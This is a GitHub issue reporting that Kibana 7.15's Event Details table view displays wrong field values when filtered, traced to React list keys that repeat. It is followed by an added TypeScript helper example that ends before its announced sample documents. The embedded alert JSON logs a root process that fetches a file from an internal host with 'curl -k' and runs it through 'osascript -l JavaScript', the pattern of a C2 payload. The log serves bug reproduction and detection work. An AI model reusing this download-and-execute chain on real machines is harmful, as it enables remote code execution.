
[Security Solution] The Event Details Panel > Table view sometimes displays unexpected values when filtered #115984

Closed
andrew-goldstein opened this issue Oct 21, 2021 · 6 comments
Labels: bug (Fixes for quality problems that affect the customer experience), Team: SecuritySolution (Security Solutions Team working on SIEM, Endpoint, Timeline, Resolver, etc.), Team:Threat Hunting:Investigations (Security Solution Investigations Team), v7.16.0

Comments

@andrew-goldstein (Contributor):

Describe the bug:

@threat-punter reports:

When I look at the threat.* fields for an alert in 7.15 in the Table view, I see some values from other fields spilling over into the threat.* fields

[screenshot: df_threat_fields]

Above: In the screenshot provided by David, the view is filtered by the text threat, and shows unexpected values for some fields

Reproducing the issue in a cloud-deployed 7.15 build

The issue was reproduced by accessing the Elastic Cloud-deployed 7.15 build of Kibana, and viewing a specific event _id: "U_EwgXwBQyGN7Uu9IgYB" in the Host > Events view, as shown in the screenshot below:

[screenshot: repro_elastic_cloud]

Above: Reproduced in the cloud-deployed 7.15 build of Kibana, hosted in Elastic Cloud

When the threat filter shown in the screenshot above was removed, the fields displayed their expected values, as shown in the screenshot below:

[screenshot: repro_elastic_cloud_filter_cleared]

Reproducing the issue filtering by _index

The issue is not specific to threat.* fields.

For example, the expected value for _index is displayed correctly (using the cloud-deployed 7.15 build of Kibana) when the view is unfiltered:

[screenshot: _index_unfiltered]

Above: The expected value for _index is displayed correctly when the view is unfiltered

When the text _index is added to the filter, the value for _index includes (unexpected) JSON:

[screenshot: _index_filtered]

Above: Filtering by _index displays unexpected JSON instead of the expected value, .ds-logs-endpoint.alerts-default-2021.09.23-000001

Although the data shown in the table appears to be corrupted, the correct value for _index is copied to the clipboard when users select the Copy to clipboard action for the _index field, as shown in the screenshot below:

[screenshot: copy-to-clipboard]

Above: the correct value for _index is copied to the clipboard, even when the data appears corrupted

Reference: The raw event (via Dev Tools)

For reference, the raw event used to reproduce the screenshots above was retrieved via Dev Tools:

GET /.ds-logs-endpoint.alerts-default-2021.09.23-000001/_doc/U_EwgXwBQyGN7Uu9IgYB

and pasted into the section below:

JSON view of the event used to reproduce the issue:
{
"_index" : ".ds-logs-endpoint.alerts-default-2021.09.23-000001",
"_type" : "_doc",
"_id" : "U_EwgXwBQyGN7Uu9IgYB",
"_version" : 1,
"_seq_no" : 82,
"_primary_term" : 1,
"found" : true,
"_source" : {
  "agent" : {
    "build" : {
      "original" : "version: 7.15.0, compiled: Wed Sep 15 18:13:15 2021, branch: 7.15, commit: b11d0070df36138bb7f3d2e115992c02587853f3"
    },
    "id" : "abcde1c9-56ca-4ea8-bdee-abcde08f5db5",
    "type" : "endpoint",
    "version" : "7.15.0"
  },
  "process" : {
    "Ext" : {
      "ancestry" : [
        "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU4MDAtMTMyNzg3Mjg1ODcuOTE1OTcwMDA=",
        "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTgtMTMyNzg3Mjg1ODYuOTMyMzYyMDAw",
        "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTgtMTMyNzg3Mjg1ODYuOTMyMDM0MDAw",
        "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTctMTMyNzg3Mjg1ODYuNzc2MzU4MDAw",
        "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTctMTMyNzg3Mjg1ODYuNzU0MDUwMDAw",
        "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTctMTMyNzg3Mjg1ODYuNzUzMTg1MDAw",
        "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTEtMTMyNzg0NDkxODQuMA==",
        "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTAtMTMyNzg0NDkxODQuMA=="
      ]
    },
    "args" : [
      "osascript",
      "-l",
      "JavaScript"
    ],
    "parent" : {
      "name" : "bash",
      "pid" : 1,
      "args_count" : 0,
      "entity_id" : "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU4MDAtMTMyNzg3Mjg1ODcuOTE1OTcwMDA=",
      "executable" : "/bin/bash"
    },
    "name" : "osascript",
    "pid" : 5800,
    "args_count" : 3,
    "entity_id" : "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU4MDAtMTMyNzg3Mjg1ODcuOTQzMjYwMDA=",
    "command_line" : "osascript -l JavaScript",
    "executable" : "/usr/bin/osascript",
    "hash" : {
      "sha1" : "af3e5a4d47206121e95af6822e52ec2a86fae951",
      "sha256" : "d07c23a7b3302a646b9b1dd54e2aff85c9bc0bf6efa51d95616091ca12ff04b7",
      "md5" : "cb1d8bafe75ab4720e47a0b51a319a72"
    }
  },
  "rule" : {
    "reference" : [
      "https://github.com/its-a-feature/Mythic"
    ],
    "name" : "Download and Execution of JavaScript Payload",
    "ruleset" : "production",
    "description" : "Identifies when curl is used to download a JavaScript payload and subsequently execute it using the built-in osascript utility. An adversary may use this technique to execute their malicious payload and obtain initial access to an endpoint.",
    "id" : "871f0c30-a7c5-40a5-80e3-a50c6714632f",
    "version" : "1.0.2"
  },
  "message" : "Malicious Behavior Detection Alert: Download and Execution of JavaScript Payload",
  "@timestamp" : "2021-10-14T23:43:07.319012489Z",
  "Endpoint" : {
    "policy" : {
      "applied" : {
        "artifacts" : {
          "global" : {
            "identifiers" : [
              {
                "sha256" : "d801aa1fb7ddcc330a5e3173372ea6af4a3d08ec58074478e85aa5603e926658",
                "name" : "diagnostic-configuration-v1"
              },
              {
                "sha256" : "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
                "name" : "diagnostic-endpointmacho-v1-blocklist"
              },
              {
                "sha256" : "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
                "name" : "diagnostic-endpointmacho-v1-exceptionlist"
              },
              {
                "sha256" : "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
                "name" : "diagnostic-endpointmacho-v1-model"
              },
              {
                "sha256" : "bc716d312cb3fdc461c7c1b0098cd6b02b291ef05d2c302788f012f9f5edc809",
                "name" : "diagnostic-malware-signature-v1-macos"
              },
              {
                "sha256" : "3a54730cae6d34f107de8ea3fb07f47e18789d6cd201cfcabbfccc3dd4e63dde",
                "name" : "diagnostic-rules-macos-v1"
              },
              {
                "sha256" : "39fecb66f9337eb33f5c0359f51ad37761ff13e4a7c4be390e03d2c227ac7cf6",
                "name" : "endpointmacho-v1-blocklist"
              },
              {
                "sha256" : "cd570c4cb16e8cffc854a385e111fe08dd2d8268183d0d6ca4dea21723d299dd",
                "name" : "endpointmacho-v1-exceptionlist"
              },
              {
                "sha256" : "6e886eeb015f3e837da5cd6ddcd6a371db28f71d2d703b8d22e194ef393bc311",
                "name" : "endpointmacho-v1-model"
              },
              {
                "sha256" : "4f91518da209eea573d18a3e6c8d767c0668a2df1b600ac5d88d23fc103b1929",
                "name" : "global-configuration-v1"
              },
              {
                "sha256" : "4abf799e6b79f0ee66a2e0b3293a92c2a122a083274cbea9d1b2c83bf57ffce7",
                "name" : "global-exceptionlist-macos"
              },
              {
                "sha256" : "9365c603590018c969300dfaec7f8758443f03b0e07a29087cfa19dd78298593",
                "name" : "global-trustlist-macos-v1"
              },
              {
                "sha256" : "0f23c6999c18471b4c8208fd5e822262579747cf6db8a30116d17fe4fd780d66",
                "name" : "production-malware-signature-v1-macos"
              },
              {
                "sha256" : "f931c50d21d64efe1cb79349f1568f9854f4c4f8bb0e7fe50b794694f604ede6",
                "name" : "production-rules-macos-v1"
              }
            ],
            "version" : "1.0.144"
          },
          "user" : {
            "identifiers" : [
              {
                "sha256" : "d801aa1fb7ddcc330a5e3173372ea6af4a3d08ec58074478e85aa5603e926658",
                "name" : "endpoint-eventfilterlist-macos-v1"
              },
              {
                "sha256" : "d801aa1fb7ddcc330a5e3173372ea6af4a3d08ec58074478e85aa5603e926658",
                "name" : "endpoint-exceptionlist-macos-v1"
              },
              {
                "sha256" : "d801aa1fb7ddcc330a5e3173372ea6af4a3d08ec58074478e85aa5603e926658",
                "name" : "endpoint-trustlist-macos-v1"
              }
            ],
            "version" : "1.0.0"
          }
        }
      }
    }
  },
  "ecs" : {
    "version" : "1.11.0"
  },
  "Events" : [
    {
      "process" : {
        "Ext" : {
          "ancestry" : [
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTktMTMyNzg3Mjg1ODcuOTA0NzgwMDA=",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTgtMTMyNzg3Mjg1ODYuOTMyMzYyMDAw",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTgtMTMyNzg3Mjg1ODYuOTMyMDM0MDAw",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTctMTMyNzg3Mjg1ODYuNzc2MzU4MDAw",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTctMTMyNzg3Mjg1ODYuNzU0MDUwMDAw",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTctMTMyNzg3Mjg1ODYuNzUzMTg1MDAw",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTEtMTMyNzg0NDkxODQuMA==",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTAtMTMyNzg0NDkxODQuMA=="
          ]
        },
        "args" : [
          "curl",
          "-k",
          "https://172.16.22.6:7443/api/v1.4/files/download/caede788-17ad-4c88-9e66-3648f8d74068"
        ],
        "parent" : {
          "name" : "bash",
          "pid" : 1,
          "args_count" : 0,
          "entity_id" : "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTktMTMyNzg3Mjg1ODcuOTA0NzgwMDA=",
          "executable" : "/bin/bash"
        },
        "name" : "curl",
        "pid" : 5799,
        "args_count" : 3,
        "entity_id" : "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTktMTMyNzg3Mjg1ODcuOTMxMDcwMDA=",
        "command_line" : "curl -k https://172.16.22.6:7443/api/v1.4/files/download/caede788-17ad-4c88-9e66-3648f8d74068",
        "executable" : "/usr/bin/curl",
        "hash" : {
          "sha1" : "37a6cc88708627f02e3709088c5d21622d94b31f",
          "sha256" : "89e3d7d8bb6fde129bdcbb574b5fdff784691ccb6e7fbc5828b16fe788a3a08c",
          "md5" : "29e098ece154f7d7cfed28bcec33fa92"
        }
      },
      "@timestamp" : "2021-10-14T23:43:07.093107Z",
      "event" : {
        "created" : "2021-10-14T23:43:07.093107Z",
        "kind" : "event",
        "action" : "exec",
        "id" : "MKFx9hsJM71wyDzr+++++KVL",
        "category" : [
          "process"
        ],
        "type" : [
          "start"
        ]
      },
      "message" : "Endpoint process event",
      "user" : {
        "Ext" : {
          "real" : {
            "name" : "root",
            "id" : 0
          }
        },
        "name" : "root",
        "id" : 0
      },
      "group" : {
        "Ext" : {
          "real" : {
            "name" : "wheel",
            "id" : 0
          }
        },
        "name" : "wheel",
        "id" : 0
      }
    },
    {
      "process" : {
        "Ext" : {
          "ancestry" : [
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU4MDAtMTMyNzg3Mjg1ODcuOTE1OTcwMDA=",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTgtMTMyNzg3Mjg1ODYuOTMyMzYyMDAw",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTgtMTMyNzg3Mjg1ODYuOTMyMDM0MDAw",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTctMTMyNzg3Mjg1ODYuNzc2MzU4MDAw",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTctMTMyNzg3Mjg1ODYuNzU0MDUwMDAw",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTctMTMyNzg3Mjg1ODYuNzUzMTg1MDAw",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTEtMTMyNzg0NDkxODQuMA==",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTAtMTMyNzg0NDkxODQuMA=="
          ]
        },
        "args" : [
          "osascript",
          "-l",
          "JavaScript"
        ],
        "parent" : {
          "name" : "bash",
          "pid" : 1,
          "args_count" : 0,
          "entity_id" : "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU4MDAtMTMyNzg3Mjg1ODcuOTE1OTcwMDA=",
          "executable" : "/bin/bash"
        },
        "name" : "osascript",
        "pid" : 5800,
        "args_count" : 3,
        "entity_id" : "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU4MDAtMTMyNzg3Mjg1ODcuOTQzMjYwMDA=",
        "command_line" : "osascript -l JavaScript",
        "executable" : "/usr/bin/osascript",
        "hash" : {
          "sha1" : "af3e5a4d47206121e95af6822e52ec2a86fae951",
          "sha256" : "d07c23a7b3302a646b9b1dd54e2aff85c9bc0bf6efa51d95616091ca12ff04b7",
          "md5" : "cb1d8bafe75ab4720e47a0b51a319a72"
        }
      },
      "@timestamp" : "2021-10-14T23:43:07.094326Z",
      "event" : {
        "created" : "2021-10-14T23:43:07.094326Z",
        "kind" : "event",
        "action" : "exec",
        "id" : "MKFx9hsJM71wyDzr+++++KVM",
        "category" : [
          "process"
        ],
        "type" : [
          "start"
        ]
      },
      "message" : "Endpoint process event",
      "user" : {
        "Ext" : {
          "real" : {
            "name" : "root",
            "id" : 0
          }
        },
        "name" : "root",
        "id" : 0
      },
      "group" : {
        "Ext" : {
          "real" : {
            "name" : "wheel",
            "id" : 0
          }
        },
        "name" : "wheel",
        "id" : 0
      }
    },
    {
      "process" : {
        "Ext" : {
          "ancestry" : [
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTktMTMyNzg3Mjg1ODcuOTA0NzgwMDA=",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTgtMTMyNzg3Mjg1ODYuOTMyMzYyMDAw",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTgtMTMyNzg3Mjg1ODYuOTMyMDM0MDAw",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTctMTMyNzg3Mjg1ODYuNzc2MzU4MDAw",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTctMTMyNzg3Mjg1ODYuNzU0MDUwMDAw",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTctMTMyNzg3Mjg1ODYuNzUzMTg1MDAw",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTEtMTMyNzg0NDkxODQuMA==",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTAtMTMyNzg0NDkxODQuMA=="
          ]
        },
        "args" : [
          "curl",
          "-k",
          "https://10.1.2.3:7443/api/v1.4/files/download/caede788-17ad-4c88-9e66-3648f8d74068"
        ],
        "parent" : {
          "name" : "bash",
          "pid" : 1,
          "args_count" : 0,
          "entity_id" : "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTktMTMyNzg3Mjg1ODcuOTA0NzgwMDA=",
          "executable" : "/bin/bash"
        },
        "name" : "curl",
        "pid" : 5799,
        "args_count" : 3,
        "entity_id" : "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTktMTMyNzg3Mjg1ODcuOTMxMDcwMDA=",
        "command_line" : "curl -k https://10.1.2.3:7443/api/v1.4/files/download/caede788-17ad-4c88-9e66-3648f8d74068",
        "executable" : "/usr/bin/curl",
        "hash" : {
          "sha1" : "37a6cc88708627f02e3709088c5d21622d94b31f",
          "sha256" : "89e3d7d8bb6fde129bdcbb574b5fdff784691ccb6e7fbc5828b16fe788a3a08c",
          "md5" : "29e098ece154f7d7cfed28bcec33fa92"
        }
      },
      "@timestamp" : "2021-10-14T23:43:07.093107Z",
      "event" : {
        "created" : "2021-10-14T23:43:07.093107Z",
        "kind" : "event",
        "action" : "exec",
        "id" : "MKFx9hsJM71wyDzr+++++KVL",
        "category" : [
          "process"
        ],
        "type" : [
          "start"
        ]
      },
      "message" : "Endpoint process event",
      "user" : {
        "Ext" : {
          "real" : {
            "name" : "root",
            "id" : 0
          }
        },
        "name" : "root",
        "id" : 0
      },
      "group" : {
        "Ext" : {
          "real" : {
            "name" : "wheel",
            "id" : 0
          }
        },
        "name" : "wheel",
        "id" : 0
      }
    },
    {
      "process" : {
        "Ext" : {
          "ancestry" : [
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU4MDAtMTMyNzg3Mjg1ODcuOTE1OTcwMDA=",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTgtMTMyNzg3Mjg1ODYuOTMyMzYyMDAw",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTgtMTMyNzg3Mjg1ODYuOTMyMDM0MDAw",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTctMTMyNzg3Mjg1ODYuNzc2MzU4MDAw",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTctMTMyNzg3Mjg1ODYuNzU0MDUwMDAw",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU3OTctMTMyNzg3Mjg1ODYuNzUzMTg1MDAw",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTEtMTMyNzg0NDkxODQuMA==",
            "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTAtMTMyNzg0NDkxODQuMA=="
          ]
        },
        "args" : [
          "osascript",
          "-l",
          "JavaScript"
        ],
        "parent" : {
          "name" : "bash",
          "pid" : 1,
          "args_count" : 0,
          "entity_id" : "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU4MDAtMTMyNzg3Mjg1ODcuOTE1OTcwMDA=",
          "executable" : "/bin/bash"
        },
        "name" : "osascript",
        "pid" : 5800,
        "args_count" : 3,
        "entity_id" : "ZmQzZDkxYzktNTZjYS00ZWE4LWJkZWUtODhkMDMwOGY1ZGI1LTU4MDAtMTMyNzg3Mjg1ODcuOTQzMjYwMDA=",
        "command_line" : "osascript -l JavaScript",
        "executable" : "/usr/bin/osascript",
        "hash" : {
          "sha1" : "af3e5a4d47206121e95af6822e52ec2a86fae951",
          "sha256" : "d07c23a7b3302a646b9b1dd54e2aff85c9bc0bf6efa51d95616091ca12ff04b7",
          "md5" : "cb1d8bafe75ab4720e47a0b51a319a72"
        }
      },
      "@timestamp" : "2021-10-14T23:43:07.094326Z",
      "event" : {
        "created" : "2021-10-14T23:43:07.094326Z",
        "kind" : "event",
        "action" : "exec",
        "id" : "MKFx9hsJM71wyDzr+++++KVM",
        "category" : [
          "process"
        ],
        "type" : [
          "start"
        ]
      },
      "message" : "Endpoint process event",
      "user" : {
        "Ext" : {
          "real" : {
            "name" : "root",
            "id" : 0
          }
        },
        "name" : "root",
        "id" : 0
      },
      "group" : {
        "Ext" : {
          "real" : {
            "name" : "wheel",
            "id" : 0
          }
        },
        "name" : "wheel",
        "id" : 0
      }
    }
  ],
  "data_stream" : {
    "namespace" : "default",
    "type" : "logs",
    "dataset" : "endpoint.alerts"
  },
  "elastic" : {
    "agent" : {
      "id" : "fd3d91c9-56ca-4ea8-bdee-88d0308f5db5"
    }
  },
  "host" : {
    "hostname" : "redacted.local",
    "os" : {
      "Ext" : {
        "variant" : "macOS"
      },
      "kernel" : "Darwin Kernel Version 20.4.0: Thu Apr 22 21:46:47 PDT 2021; root:xnu-7195.101.2~1/RELEASE_X86_64",
      "name" : "macOS",
      "family" : "macos",
      "type" : "macos",
      "version" : "11.3.1",
      "platform" : "macos",
      "full" : "macOS 11.3.1"
    },
    "ip" : [
      "127.0.0.1",
      "::1",
      "0000::1",
      "10.1.2.3",
      "0000::0000:0000:0000:0000"
    ],
    "name" : "redacted.local",
    "id" : "564DF6B5-6BA3-278A-DF1D-455EE74AAFBE",
    "mac" : [
      "aa:bb:cc:dd:ee:ff"
    ],
    "architecture" : "x86_64"
  },
  "threat" : [
    {
      "framework" : "MITRE ATT&CK",
      "technique" : [
        {
          "reference" : "https://attack.mitre.org/techniques/T1059/",
          "name" : "Command and Scripting Interpreter",
          "subtechnique" : [
            {
              "reference" : "https://attack.mitre.org/techniques/T1059/007/",
              "name" : "JavaScript/JScript",
              "id" : "T1059.007"
            }
          ],
          "id" : "T1059"
        }
      ],
      "tactic" : {
        "reference" : "https://attack.mitre.org/tactics/TA0002/",
        "name" : "Execution",
        "id" : "TA0002"
      }
    }
  ],
  "event" : {
    "severity" : 99,
    "code" : "behavior",
    "risk_score" : 99,
    "created" : "2021-10-14T23:43:07.319012489Z",
    "kind" : "alert",
    "module" : "endpoint",
    "type" : [
      "info",
      "allowed"
    ],
    "agent_id_status" : "verified",
    "sequence" : 48364,
    "ingested" : "2021-10-14T23:43:07Z",
    "action" : "rule_detection",
    "id" : "MKFx9hsJM71wyDzr+++++KW4",
    "category" : [
      "malware",
      "intrusion_detection"
    ],
    "dataset" : "endpoint.alerts",
    "outcome" : "success"
  },
  "user" : {
    "Ext" : {
      "real" : {
        "name" : "root",
        "id" : 0
      }
    },
    "name" : "root",
    "id" : 0
  },
  "group" : {
    "Ext" : {
      "real" : {
        "name" : "wheel",
        "id" : 0
      }
    },
    "name" : "wheel",
    "id" : 0
  }
}
}

A related React key issue

The values displayed in table view are rendered by the FieldValueCell component in the following file:

x-pack/plugins/security_solution/public/common/components/event_details/table/field_value_cell.tsx

A React key issue was recently spotted and fixed in this file while working on an unrelated enhancement (#115141).

The exact line in question changed the value of the key from:

<EuiText size="xs" key={value}>

to

<EuiFlexItem grow={false} key={`${i}-${value}`}>

The PR contains the following explanation of the change:

The original code used key={value}, but that's not correct because users may index a document like:

POST /test-delete-me/_doc/1?pretty
{
    "has_dupes": ["foo", "bar", "baz", "foo"]
}

which, when retrieved via GET /test-delete-me/_doc/1?pretty, returns the non-unique values in the array:

{
  "_index" : "test-delete-me",
  "_id" : "1",
  "_version" : 1,
  "_seq_no" : 0,
  "_primary_term" : 1,
  "found" : true,
  "_source" : {
    "has_dupes" : [
      "foo",
      "bar",
      "baz",
      "foo"
    ]
  }
}

The official React docs on lists and keys link to Index as a key is an anti-pattern, which recommends evaluating three conditions to determine whether or not it's safe to use index as a key:

To help you decide, I put together three conditions which these examples have in common:

1. the list and items are static–they are not computed and do not change;
2. the items in the list have no ids;
3. the list is never reordered or filtered.

When all of them are met, you may safely use the index as a key.

Applying the criteria above, the details panel fails condition 3:

3. the list is never reordered or filtered.

because users can filter the view by value, as shown in the screenshot below:

[screenshot: filter-by-value]

At the time of the PR review above, this discussion was just theoretical, but per the next section below, applying the changes in that PR directly to the 7.15 branch resolves the issue when running a local Kibana instance against the same cloud deployment.

Applying the key changes to the 7.15 branch

First, the issue was reproduced with a local checkout of the 7.15 branch, connected to the cloud deployment:

[screenshot: local_7_15_repro]

Above: The issue reproduced with a local checkout of 7.15, connected to the cloud deployment

Next, the two changes to the React keys in x-pack/plugins/security_solution/public/common/components/event_details/table/field_value_cell.tsx were applied directly to a local checkout of the Kibana 7.15 branch, as shown in the diff below:

[screenshot: key_changes_to_7_15_branch]

Above: The key changes applied to a local checkout of 7.15

After making the key changes above, filtering by _index shows the correct value, as shown in the screenshot below:

[screenshot: _index_fixed]

Above: Filtering by _index shows the correct value when the key fixes are applied directly to the local checkout of 7.15

Filtering by threat also works correctly, even when multiple fields have the same value, for example:

threat.technique.subtechnique.name: "JavaScript/JScript"

and

threat.technique.subtechnique.name.text: "JavaScript/JScript"

as shown in the screenshot below:

[screenshot: filter_by_threat_fixed]

Above: Filtering by threat works correctly, even when multiple fields have the same value

Duplicate field values when no filter is applied

You may have noticed that some fields had duplicate values, even when no filter was applied. For example, the following screenshot is from the cloud-deployed version of Kibana:

[screenshot: other_fields_unfiltered]

Above: other fields, unfiltered, in the cloud-deployed version of Kibana

In the screenshot above, the Events.user.name field displays the value root four times in the unfiltered view. Applying the React key fix described in the previous section does not change this behavior.

To better understand this behavior, the raw JSON output of the following Dev Tools query:

GET /.ds-logs-endpoint.alerts-default-2021.09.23-000001/_doc/U_EwgXwBQyGN7Uu9IgYB

was copy-pasted into a JSON formatter that supports collapsing regions, as shown in the screenshot below:

[screenshot: events_array_values]

Above: The JSON representation of the event, collapsed to only show Events

Per the screenshot above:

  • The _source document contains an array of Events
  • The Events array contains four objects
  • All four objects in the Events array have a child object named user

When expanded, all four Events.user.names have the value root, as shown in the screenshot below:

[screenshot: Events_user_name_root]

Above: all four Events.user.names have the value root

Using the technique above, the duplicate values were all found to be contained in the original source event, which is included in this issue. (The attached event may be re-indexed to verify the fix.)

Kibana/Elasticsearch Stack version:

7.15

Original install method (e.g. download page, yum, from source, etc.):

Elastic Cloud

@andrew-goldstein andrew-goldstein added bug Fixes for quality problems that affect the customer experience Team: SecuritySolution Security Solutions Team working on SIEM, Endpoint, Timeline, Resolver, etc. Team:Threat Hunting:Investigations Security Solution Investigations Team labels Oct 21, 2021
@andrew-goldstein andrew-goldstein self-assigned this Oct 21, 2021
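The two observations in the report above (that key={value} collides whenever a field carries repeated values, and that the four root values shown for Events.user.name come from the four objects in the source document's Events array rather than from the renderer) can be reproduced offline with the following TypeScript. This is an added example, not Kibana's code. flattenSource, rowsFor and keyCollisions are hypothetical helpers written for this example: flattenSource collapses a nested _source into dotted field paths the way the table displays them (array elements share the parent path, so no index appears in it), rowsFor applies the panel's substring filter on field names, and keyCollisions reports which React keys a given key scheme would hand to more than one sibling. The sample documents are constructed from the JSON in the issue. The real panel also receives multi-fields such as threat.technique.subtechnique.name.text from the fields API, which this simplified flattening does not model.

```typescript
// Added example (not Kibana's code): a simplified model of how the Event
// Details "Table view" turns a raw _source document into rows, used to
// reproduce two observations from this issue offline:
//   1. array-valued fields such as Events[].user.name legitimately produce
//      repeated values (the four "root"s come from four Events objects), and
//   2. key={value} collides on such repeats, while key={`${i}-${value}`}
//      is unique for every rendered value.
// flattenSource, rowsFor and keyCollisions are hypothetical helpers written
// for this example; the sample documents are constructed from the issue text.

export type Json = string | number | boolean | null | Json[] | { [key: string]: Json };

/** Flatten a nested _source into dotted field paths. Arrays of objects
 *  contribute every leaf under the same path (no index in the path), which
 *  is why Events.user.name ends up with four entries. */
export function flattenSource(
  doc: Json,
  prefix: string = '',
  out: { [field: string]: string[] } = {}
): { [field: string]: string[] } {
  if (Array.isArray(doc)) {
    for (const item of doc) flattenSource(item, prefix, out);
  } else if (doc !== null && typeof doc === 'object') {
    const obj = doc as { [key: string]: Json };
    for (const key of Object.keys(obj)) {
      flattenSource(obj[key], prefix ? prefix + '.' + key : key, out);
    }
  } else {
    if (!out[prefix]) out[prefix] = [];
    out[prefix].push(String(doc));
  }
  return out;
}

export interface Row {
  field: string;
  values: string[];
}

/** Rows the table view shows: every field whose name contains the filter text
 *  (case-insensitive substring, like the "threat" and "_index" filters in the
 *  issue). An empty filter shows every field. */
export function rowsFor(flat: { [field: string]: string[] }, filter: string = ''): Row[] {
  const needle = filter.toLowerCase();
  return Object.keys(flat)
    .filter((field) => field.toLowerCase().indexOf(needle) !== -1)
    .sort()
    .map((field) => ({ field, values: flat[field] }));
}

/** Original key scheme from the issue: key={value}. */
export function keyByValue(_index: number, value: string): string {
  return value;
}

/** Key scheme introduced by the fix: key={`${i}-${value}`}. */
export function keyByIndexAndValue(index: number, value: string): string {
  return index + '-' + value;
}

/** For each row, the keys a scheme would hand to more than one sibling
 *  element. An empty object means every sibling key is unique. */
export function keyCollisions(
  rows: Row[],
  keyOf: (index: number, value: string) => string
): { [field: string]: string[] } {
  const collisions: { [field: string]: string[] } = {};
  for (const row of rows) {
    const counts: { [key: string]: number } = {};
    row.values.forEach((value, i) => {
      const key = keyOf(i, value);
      counts[key] = (counts[key] || 0) + 1;
    });
    const dupes = Object.keys(counts).filter((key) => counts[key] > 1);
    if (dupes.length > 0) collisions[row.field] = dupes;
  }
  return collisions;
}

// Constructed sample documents, reduced from the JSON in the issue.
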